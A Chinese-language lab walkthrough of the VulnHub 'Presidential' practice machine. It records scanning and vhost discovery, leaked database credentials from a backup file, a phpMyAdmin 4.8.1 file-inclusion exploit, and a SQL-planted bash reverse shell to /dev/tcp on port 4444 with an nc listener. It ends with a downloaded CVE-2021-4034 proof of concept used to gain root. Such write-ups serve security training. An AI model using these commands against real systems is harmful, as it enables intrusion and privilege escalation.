vulnhub之Presidential的实践

今天实践的是vulnhub的Presidential镜像，

下载地址，https://download.vulnhub.com/presidential/Presidential.ova，

用workstation导入，做地址扫描，sudo netdiscover -r 192.168.58.0/24，

187就是靶机，

继续做端口扫描，sudo nmap -sS -sV -T5 -A -p- 192.168.58.187，

有web服务，浏览器访问http://192.168.58.187，

猜测192.168.58.187对应的域名是votenow.local，

做php路径扫描，dirb http://192.168.58.187 -X .php,.php.bak，

浏览器访问http://192.168.58.187/config.php.bak，查看页面源码，

获取到用户名密码votebox/casoj3FFASPsbyoRP，

本地hosts文件添加192.168.58.187      votenow.local，

做子域名的扫描，

gobuster vhost --append-domain -u votenow.local -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt | grep "Status: 200"

本地hosts文件再添加192.168.58.187      datasafe.votenow.local，

浏览器访问http://datasafe.votenow.local，

确认到应用信息phpmyadmin 4.8.1，搜索可利用的漏洞，

聚焦到一个文件包含漏洞，获取到利用方法，

提交select '& /dev/tcp/192.168.58.188/4444 0>&1");exit;?>'，

查询cookie填到url中，kali攻击机上开个反弹shell监听，nc -lvp 4444，

浏览器访问http://datasafe.votenow.local/index.php?target=db_sql.php%253f/../../../../../../../../var/lib/php/session/sess_qk9ji8g6c1iupcko6df5nn5g8a8779pt，

反弹shell这就过来了，不是root，需要提权，

上传linpeas.sh文件，

wget https://github.com/carlospolop/PEASS-ng/releases/download/20230319/linpeas.sh，

获取到可利用的漏洞，CVE-2021-4034，

从网上找到可用的poc文件，

wget https://github.com/EstamelGG/CVE-2021-4034-NoGCC/releases/download/v4.0/cve-2021-4034-poc-64，

执行poc文件，id确认是root，